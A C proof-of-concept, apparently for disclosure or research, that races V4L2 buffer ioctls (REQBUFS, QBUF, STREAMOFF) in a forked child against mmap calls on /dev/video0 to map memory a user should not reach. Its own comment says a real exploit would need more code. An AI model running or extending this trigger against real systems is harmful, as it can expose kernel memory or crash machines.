#include<stdlib.h>
#include<unistd.h>
#include<stdio.h>
#include <linux/videodev2.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <semaphore.h>
#include <string.h>
#include <pthread.h>
#include <errno.h>

int main() {
    int vdfd = open("/dev/video0",O_RDWR);
    if(vdfd == -1) {
        printf("open: %m\n");
        return 1;
    }
    struct v4l2_requestbuffers rb;
    rb.count = 1;
    rb.memory = V4L2_MEMORY_MMAP;
    rb.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
    int ret = ioctl(vdfd,VIDIOC_REQBUFS,&rb);
    if(ret == -1) {
        printf("ioctl: %m\n");
        return 1;
    }
    pthread_barrier_t* barrier = mmap(NULL,0x1000,PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);
    if(barrier == (void*) -1) {
        printf("mmap: %m\n");
        return 1;
    }
    pthread_barrierattr_t* attr = (pthread_barrierattr_t*) (((char*) barrier) + 10*sizeof(barrier));
    pthread_barrierattr_init(attr);

    pthread_barrierattr_setpshared(attr,PTHREAD_PROCESS_SHARED);
    ret = pthread_barrier_init(barrier,attr,2);
    if(ret < 0) {
        printf("pthread_barrier_init: %m\n");
    }

    struct v4l2_buffer buf;
    memset(&buf,0,sizeof(buf));
    buf.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
    buf.length = 0x96000;
    buf.bytesused = 0x96000;
    buf.memory = V4L2_MEMORY_USERPTR;
    buf.m.userptr = (unsigned long) mmap(NULL,0x96000,PROT_READ | PROT_WRITE,MAP_PRIVATE | MAP_ANONYMOUS,0,0);
    memset((void*) buf.m.userptr,'A',0x1000);
    buf.index = 0;

    struct v4l2_buffer buf2;
    memset(&buf2,0,sizeof(buf2));
    buf2.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
    buf2.length = 0x96000;
    buf2.bytesused = 0x96000;
    buf2.memory = V4L2_MEMORY_USERPTR;
    buf2.m.userptr = (unsigned long) mmap(NULL,0x96000,PROT_READ | PROT_WRITE,MAP_PRIVATE | MAP_ANONYMOUS,0,0);
    memset((void*) buf2.m.userptr,'A',0x1000);
    buf2.index = 0;

    switch(fork()) {
        case 0:
        while(1) {
            pthread_barrier_wait(barrier);
            rb.memory = V4L2_MEMORY_USERPTR;
            ret = ioctl(vdfd,VIDIOC_REQBUFS,&rb);
            if(ret == -1) {
                printf("ioctl reqbufs userptr: %m\n");
                sleep(1);
            }
            ret = ioctl(vdfd,VIDIOC_QBUF,&buf);
            if(ret == -1) {
                printf("ioctl qbuf: %m\n");
                sleep(1);
            }
            ret = ioctl(vdfd,VIDIOC_STREAMOFF,&rb.type);
            if(ret == -1) {
                printf("ioctl streamoff: %m\n");
                sleep(1);
            }
            ret = ioctl(vdfd,VIDIOC_QBUF,&buf2);
            if(ret == -1) {
                printf("ioctl qbuf2: %m\n");
                sleep(1);
            }
            pthread_barrier_wait(barrier);
            rb.memory = V4L2_MEMORY_MMAP;
            ret = ioctl(vdfd,VIDIOC_REQBUFS,&rb);
            if(ret == -1) {
                printf("ioctl reqbufs mmap: %m\n");
                sleep(1);
            }
        }
        case -1:
            printf("fork: %m\n");
            return 1;
        default:
            break;
    }
    while(1) {
        pthread_barrier_wait(barrier);
        void* map = mmap(NULL,0x1000,PROT_READ | PROT_WRITE,MAP_SHARED,vdfd,(unsigned) buf.m.userptr);
        if(map != (void*) -1) {
            printf("mmap succeeded!");
            /* At this point, either the entirety of mmap has raced the very first ioctl call and won,
             * or we may have mapped a virtual address that probably shouldn't be mappable.
             * if I were to be writing a real exploit, there would be additional code here. As it is
             * we'll just ignore and move on.
             */
            munmap(map,0x1000);
        }
        pthread_barrier_wait(barrier);

    }
    close(vdfd);
}